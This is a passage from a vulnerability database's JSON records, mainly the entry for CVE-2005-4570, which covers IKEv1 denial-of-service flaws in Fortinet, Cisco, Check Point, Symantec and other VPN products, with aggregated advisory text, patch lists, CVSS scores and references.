            "ident": null
          },
          {
            "date": "2007-11-27T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2007-000796",
            "ident": null
          },
          {
            "date": "2007-11-07T23:46:00",
            "db": "NVD",
            "id": "CVE-2007-5116",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2018-10-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-28478",
            "ident": null
          },
          {
            "date": "2015-03-19T08:05:00",
            "db": "BID",
            "id": "26350",
            "ident": null
          },
          {
            "date": "2007-11-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200711-104",
            "ident": null
          },
          {
            "date": "2009-02-20T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2007-000796",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2007-5116",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "61507"
          },
          {
            "db": "PACKETSTORM",
            "id": "129524"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-104"
          }
        ],
        "trust": 0.8
      },
      "title": {
        "_id": null,
        "data": "Perl Buffer Overflow Vulnerability in Regular Expression Engine",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-000796"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "buffer overflow",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-104"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200512-0678

    Vulnerability from variot - Updated: 2026-03-09 21:08

    The Internet Key Exchange version 1 (IKEv1) implementations in Fortinet FortiOS 2.50, 2.80 and 3.0, FortiClient 2.0,; and FortiManager 2.80 and 3.0 allow remote attackers to cause a denial of service (termination of a process that is automatically restarted) via IKE packets with invalid values of certain IPSec attributes, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1. NOTE: due to the lack of details in the vendor advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. Numerous vulnerabilities have been reported in various Internet Key Exchange version 1 (IKEv1) implementations. The impacts of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or cause an IKEv1 implementation to behave in an unstable/unpredictable manner. Fortinet FortiGate, FortiManager, and FortiClient products are prone to denial of service vulnerabilities. These issues are due to security flaws in Fortinet's IPSec implementation. These vulnerabilities may be triggered by malformed IKE traffic. This issue was discovered with the PROTOS ISAKMP Test Suite and is related to the handling of malformed IKEv1 traffic.

    For more information: SA17553

    Several other bugs have also been fixed in this update. IKE will be reportedly be automatically restarted by FortiOS when it crashes.

    FortiGate (version 2.80): Apply MR12 when available or contact technical support for a special build.

    FortiGate (version 2.50): No patch available at this time.

    FortiManager (version 2.80): No patch available at this time.

    FortiClient: No patch available at this time.

    The vulnerability is caused due to errors in the processing of IKEv1 Phase 1 protocol exchange messages. This can be exploited to cause a DoS. * Cisco IOS versions based on 12.2SXD, 12.3T, 12.4 and 12.4T * Cisco PIX Firewall versions up to but not including 6.3(5) * Cisco PIX Firewall/ASA versions up to but not including 7.0.1.4 * Cisco Firewall Services Module (FWSM) versions up to but not including 2.3(3) * Cisco VPN 3000 Series Concentrators versions up to but not including 4.1(7)H and 4.7(2)B * Cisco MDS Series SanOS versions up to but not including 2.1(2)

    Note: For Cisco IOS, only images that contain the Crypto Feature Set are vulnerable.

    SOLUTION: See patch matrix in vendor advisory for information about fixes. http://www.cisco.com/warp/public/707/cisco-sa-20051114-ipsec.shtml#software

    PROVIDED AND/OR DISCOVERED BY: Oulu University Secure Programming Group (OUSPG) .

    For more information: SA17553

    Successful exploitation reportedly requires that the attacker is able to perform a full IKE negotiation with the affected system and requires authentication. * VPN-1/Firewall-1 NG with AI R54 prior to HFA_417. * VPN-1/Firewall-1 NG with AI R55 prior to HFA_16. * VPN-1/Firewall-1 NG with AI R55W prior to HFA_04. * VPN-1/Firewall-1 NG with AI R55P prior to HFA_06. * VPN-1 Pro NGX R60 prior to HFA_01. * Check Point Express CI R57. * Firewall-1 GX 3.0.

    SOLUTION: Install the latest HFA (HotFix Accumulator).

    Note: A fix will reportedly not be released for NG FP3. The vendor recommends upgrading to a recent version, and to the most recent HFA of this version.

    The vendor reportedly will release hotfixes for Check Point Express CI and Firewall-1 GX 3.0 at a later date.

    The vulnerability is related to: SA17553

    SOLUTION: Refer to the original advisory from Nortel Networks for instructions how to apply fixes.

    The vulnerability is related to: SA17553

    Successful exploitation requires a weak racoon configuration (e.g. no lifetime proposal or obey mode), and using 3DES/SHA1/DH2.

    TITLE: Symantec Firewall/VPN/Gateway ISAKMP Message Processing Denial of Service

    SECUNIA ADVISORY ID: SA17684

    VERIFY ADVISORY: http://secunia.com/advisories/17684/

    CRITICAL: Moderately critical

    IMPACT: DoS

    WHERE:

    From remote

    OPERATING SYSTEM: Symantec Gateway Security 400 Series http://secunia.com/product/6175/ Symantec Gateway Security 300 Series http://secunia.com/product/6176/ Symantec Gateway Security 3.x http://secunia.com/product/6177/ Symantec Gateway Security 2.x http://secunia.com/product/3104/ Symantec Gateway Security 1.x http://secunia.com/product/876/ Symantec Firewall/VPN Appliance 100/200/200R http://secunia.com/product/552/

    SOFTWARE: Symantec Enterprise Firewall (SEF) 8.x http://secunia.com/product/3587/

    DESCRIPTION: Symantec has acknowledged a vulnerability in various Symantec products, which can be exploited by malicious people to cause a DoS (Denial of Service).

    For more information: SA17553

    Successful exploitation causes a DoS of the dynamic VPN services.

    The vulnerability has been reported in the following products. * Symantec Enterprise Firewall version 8.0 (Windows) * Symantec Enterprise Firewall version 8.0 (Solaris) * Symantec Gateway Security 5000 Series version 3.0 * Symantec Gateway Security 5400 version 2.0.1 * Symantec Gateway Security 5310 version 1.0 * Symantec Gateway Security 5200/5300 version 1.0 * Symantec Gateway Security 5100 * Symantec Gateway Security 400 version 2.0 * Symantec Gateway Security 300 version 2.0 * Symantec Firewall /VPN Appliance 200/200R * Symantec Firewall /VPN Appliance 100

    SOLUTION: Apply hotfixes.

    Symantec Enterprise Firewall version 8.0 (Windows): Apply SEF8.0-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8/files.html

    Symantec Enterprise Firewall version 8.0 (Solaris): Apply SEF8.0-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8_sol/files.html

    Symantec Gateway Security 5000 Series version 3.0: Apply SGS3.0-2005114-02. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_5600_3/files.html

    Symantec Gateway Security 5400 version 2.0.1: Apply SGS2.0.1-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_201_5400/files.html

    Symantec Gateway Security 5310 version 1.0: Apply SG7004-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5310/files.html

    Symantec Gateway Security 5200/5300 version 1.0: Apply SG7004-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_52005300/files.html

    Symantec Gateway Security 5100: Apply SG7004-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5110/files.html

    Symantec Gateway Security 400 version 2.0: Update to build 1103. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_2_400/files.html

    Symantec Gateway Security 300 version 2.0: Update to build 1103. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_300s_2/files.html

    Symantec Firewall /VPN Appliance 200/200R: Update to build 1.8F. http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_200r/files.html

    Symantec Firewall /VPN Appliance 100: Update to build 1.8F. http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_100/files.html

    ORIGINAL ADVISORY: Symantec: http://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html

    OTHER REFERENCES: SA17553: http://secunia.com/advisories/17553/


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


    Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-200512-0678",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "check point",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "fortinet",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openswan linux ipsec",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "qnx",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "model": "fortios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fortinet",
            "version": "3.0"
          },
          {
            "model": "fortios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fortinet",
            "version": "2.80"
          },
          {
            "model": "fortios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fortinet",
            "version": "2.50"
          },
          {
            "model": "fortimanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fortinet",
            "version": "3.0"
          },
          {
            "model": "fortimanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fortinet",
            "version": "2.80"
          },
          {
            "model": "forticlient",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fortinet",
            "version": "2.0"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "BID",
            "id": "15997"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Discovery is credited to NISCC, CERT-FI, and the Oulu University Secure Programming Group.",
        "sources": [
          {
            "db": "BID",
            "id": "15997"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200512-619"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2005-4570",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2005-4570",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "VHN-15778",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2005-4570",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#226364",
                "trust": 0.8,
                "value": "16.54"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200512-619",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-15778",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-15778"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200512-619"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-4570"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The Internet Key Exchange version 1 (IKEv1) implementations in Fortinet FortiOS 2.50, 2.80 and 3.0, FortiClient 2.0,; and FortiManager 2.80 and 3.0 allow remote attackers to cause a denial of service (termination of a process that is automatically restarted) via IKE packets with invalid values of certain IPSec attributes, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1.  NOTE: due to the lack of details in the vendor advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. Numerous vulnerabilities have been reported in various Internet Key Exchange version 1 (IKEv1) implementations. The impacts of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or cause an IKEv1 implementation to behave in an unstable/unpredictable manner. Fortinet FortiGate, FortiManager, and FortiClient products are prone to denial of service vulnerabilities. These issues are due to security flaws in Fortinet\u0027s IPSec implementation. These vulnerabilities may be triggered by malformed IKE traffic. \nThis issue was discovered with the PROTOS ISAKMP Test Suite and is related to the handling of malformed IKEv1 traffic. \n\nFor more information:\nSA17553\n\nSeveral other bugs have also been fixed in this update. IKE will\nbe reportedly be automatically restarted by FortiOS when it crashes. \n\nFortiGate (version 2.80):\nApply MR12 when available or contact technical support for a special\nbuild. \n\nFortiGate (version 2.50):\nNo patch available at this time. \n\nFortiManager (version 2.80):\nNo patch available at this time. \n\nFortiClient:\nNo patch available at this time. \r\n\r\nThe vulnerability is caused due to errors in the processing of IKEv1\nPhase 1 protocol exchange messages. This can be exploited to cause a\nDoS. \r\n* Cisco IOS versions based on 12.2SXD, 12.3T, 12.4 and 12.4T\r\n* Cisco PIX Firewall versions up to but not including 6.3(5)\r\n* Cisco PIX Firewall/ASA versions up to but not including 7.0.1.4\r\n* Cisco Firewall Services Module (FWSM) versions up to but not\nincluding 2.3(3)\r\n* Cisco VPN 3000 Series Concentrators versions up to but not\nincluding 4.1(7)H and 4.7(2)B\r\n* Cisco MDS Series SanOS versions up to but not including 2.1(2)\r\n\r\nNote: For Cisco IOS, only images that contain the Crypto Feature Set\nare vulnerable. \n\nSOLUTION:\nSee patch matrix in vendor advisory for information about fixes. \r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20051114-ipsec.shtml#software\n\nPROVIDED AND/OR DISCOVERED BY:\nOulu University Secure Programming Group (OUSPG) . \n\nFor more information:\nSA17553\n\nSuccessful exploitation reportedly requires that the attacker is able\nto perform a full IKE negotiation with the affected system and\nrequires authentication. \n* VPN-1/Firewall-1 NG with AI R54 prior to HFA_417. \n* VPN-1/Firewall-1 NG with AI R55 prior to HFA_16. \n* VPN-1/Firewall-1 NG with AI R55W prior to HFA_04. \n* VPN-1/Firewall-1 NG with AI R55P prior to HFA_06. \n* VPN-1 Pro NGX R60 prior to HFA_01. \n* Check Point Express CI R57. \n* Firewall-1 GX 3.0. \n\nSOLUTION:\nInstall the latest HFA (HotFix Accumulator). \n\nNote: A fix will reportedly not be released for NG FP3. The vendor\nrecommends upgrading to a recent version, and to the most recent HFA\nof this version. \n\nThe vendor reportedly will release hotfixes for Check Point Express\nCI and Firewall-1 GX 3.0 at a later date. \r\n\r\nThe vulnerability is related to:\r\nSA17553\n\nSOLUTION:\nRefer to the original advisory from Nortel Networks for instructions\nhow to apply fixes. \n\nThe vulnerability is related to:\nSA17553\n\nSuccessful exploitation requires a weak racoon configuration (e.g. no\nlifetime proposal or obey mode), and using 3DES/SHA1/DH2. \n\nTITLE:\nSymantec Firewall/VPN/Gateway ISAKMP Message Processing Denial of\nService\n\nSECUNIA ADVISORY ID:\nSA17684\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/17684/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nDoS\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nSymantec Gateway Security 400 Series\nhttp://secunia.com/product/6175/\nSymantec Gateway Security 300 Series\nhttp://secunia.com/product/6176/\nSymantec Gateway Security 3.x\nhttp://secunia.com/product/6177/\nSymantec Gateway Security 2.x\nhttp://secunia.com/product/3104/\nSymantec Gateway Security 1.x\nhttp://secunia.com/product/876/\nSymantec Firewall/VPN Appliance 100/200/200R\nhttp://secunia.com/product/552/\n\nSOFTWARE:\nSymantec Enterprise Firewall (SEF) 8.x\nhttp://secunia.com/product/3587/\n\nDESCRIPTION:\nSymantec has acknowledged a vulnerability in various Symantec\nproducts, which can be exploited by malicious people to cause a DoS\n(Denial of Service). \n\nFor more information:\nSA17553\n\nSuccessful exploitation causes a DoS of the dynamic VPN services. \n\nThe vulnerability has been reported in the following products. \n* Symantec Enterprise Firewall version 8.0 (Windows)\n* Symantec Enterprise Firewall version 8.0 (Solaris)\n* Symantec Gateway Security 5000 Series version 3.0\n* Symantec Gateway Security 5400 version 2.0.1\n* Symantec Gateway Security 5310 version 1.0\n* Symantec Gateway Security 5200/5300 version 1.0\n* Symantec Gateway Security 5100\n* Symantec Gateway Security 400 version 2.0\n* Symantec Gateway Security 300\tversion 2.0\n* Symantec Firewall /VPN Appliance 200/200R\n* Symantec Firewall /VPN Appliance 100\n\nSOLUTION:\nApply hotfixes. \n\nSymantec Enterprise Firewall version 8.0 (Windows):\nApply SEF8.0-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8/files.html\n\nSymantec Enterprise Firewall version 8.0 (Solaris):\nApply SEF8.0-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8_sol/files.html\n\nSymantec Gateway Security 5000 Series version 3.0:\nApply SGS3.0-2005114-02. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_5600_3/files.html\n\nSymantec Gateway Security 5400 version 2.0.1:\nApply SGS2.0.1-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_201_5400/files.html\n\nSymantec Gateway Security 5310 version 1.0:\nApply SG7004-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5310/files.html\n\nSymantec Gateway Security 5200/5300 version 1.0:\nApply SG7004-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_52005300/files.html\n\nSymantec Gateway Security 5100:\nApply SG7004-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5110/files.html\n\nSymantec Gateway Security 400 version 2.0:\nUpdate to build 1103. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_2_400/files.html\n\nSymantec Gateway Security 300 version 2.0:\nUpdate to build 1103. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_300s_2/files.html\n\nSymantec Firewall /VPN Appliance 200/200R:\nUpdate to build 1.8F. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_200r/files.html\n\nSymantec Firewall /VPN Appliance 100:\nUpdate to build 1.8F. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_100/files.html\n\nORIGINAL ADVISORY:\nSymantec:\nhttp://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html\n\nOTHER REFERENCES:\nSA17553:\nhttp://secunia.com/advisories/17553/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-4570"
          },
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "BID",
            "id": "15997"
          },
          {
            "db": "VULHUB",
            "id": "VHN-15778"
          },
          {
            "db": "PACKETSTORM",
            "id": "41982"
          },
          {
            "db": "PACKETSTORM",
            "id": "43036"
          },
          {
            "db": "PACKETSTORM",
            "id": "41515"
          },
          {
            "db": "PACKETSTORM",
            "id": "41614"
          },
          {
            "db": "PACKETSTORM",
            "id": "41586"
          },
          {
            "db": "PACKETSTORM",
            "id": "41791"
          },
          {
            "db": "PACKETSTORM",
            "id": "41739"
          },
          {
            "db": "PACKETSTORM",
            "id": "41734"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "BID",
            "id": "15997",
            "trust": 2.0
          },
          {
            "db": "SECUNIA",
            "id": "18446",
            "trust": 1.8
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-0182",
            "trust": 1.7
          },
          {
            "db": "NVD",
            "id": "CVE-2005-4570",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "17621",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17663",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17838",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17553",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17608",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17684",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17668",
            "trust": 0.9
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2005.0924",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#226364",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200512-619",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-15778",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41982",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "43036",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41515",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41614",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41586",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41791",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41739",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41734",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-15778"
          },
          {
            "db": "BID",
            "id": "15997"
          },
          {
            "db": "PACKETSTORM",
            "id": "41982"
          },
          {
            "db": "PACKETSTORM",
            "id": "43036"
          },
          {
            "db": "PACKETSTORM",
            "id": "41515"
          },
          {
            "db": "PACKETSTORM",
            "id": "41614"
          },
          {
            "db": "PACKETSTORM",
            "id": "41586"
          },
          {
            "db": "PACKETSTORM",
            "id": "41791"
          },
          {
            "db": "PACKETSTORM",
            "id": "41739"
          },
          {
            "db": "PACKETSTORM",
            "id": "41734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200512-619"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-4570"
          }
        ]
      },
      "id": "VAR-200512-0678",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-15778"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-03-09T21:08:13.620000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-4570"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.1,
            "url": "http://www.fortinet.com/fortiguardcenter/vu226364.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/15997"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/18446"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/17553/"
          },
          {
            "trust": 1.2,
            "url": "http://www.niscc.gov.uk/niscc/docs/re-20051114-01014.pdf?lang=en"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2006/0182"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17608/"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17621/"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17684/"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17668/"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17663/"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17838/"
          },
          {
            "trust": 0.8,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp"
          },
          {
            "trust": 0.8,
            "url": "http://www.ficora.fi/suomi/tietoturva/varoitukset/varoitus-2005-82.htm"
          },
          {
            "trust": 0.8,
            "url": "http://www.auscert.org.au/5748"
          },
          {
            "trust": 0.8,
